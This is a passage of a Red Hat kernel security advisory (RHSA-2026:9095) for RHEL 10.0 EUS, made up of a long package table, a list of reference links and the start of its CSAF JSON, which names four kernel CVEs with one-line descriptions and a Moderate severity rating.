| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:9095 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2436805 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2439887 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2439951 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2444376 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2026-23066 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2436805 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23066 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23066 | external |
| https://lore.kernel.org/linux-cve-announce/202602… | external |
| https://access.redhat.com/security/cve/CVE-2026-23156 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2439951 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23156 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23156 | external |
| https://lore.kernel.org/linux-cve-announce/202602… | external |
| https://access.redhat.com/security/cve/CVE-2026-23193 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2439887 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23193 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23193 | external |
| https://lore.kernel.org/linux-cve-announce/202602… | external |
| https://access.redhat.com/security/cve/CVE-2026-23231 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2444376 | external |
| https://www.cve.org/CVERecord?id=CVE-2026-23231 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2026-23231 | external |
| https://lore.kernel.org/linux-cve-announce/202603… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel is now available for Red Hat Enterprise Linux 10.0 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Linux kernel: Denial of Service via unsafe requeue in rxrpc_recvmsg (CVE-2026-23066)\n\n* kernel: scsi: target: iscsi: Fix use-after-free in iscsit_dec_session_usage_count() (CVE-2026-23193)\n\n* kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation (CVE-2026-23156)\n\n* kernel: kernel: Privilege escalation or denial of service via use-after-free in nf_tables_addchain() (CVE-2026-23231)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
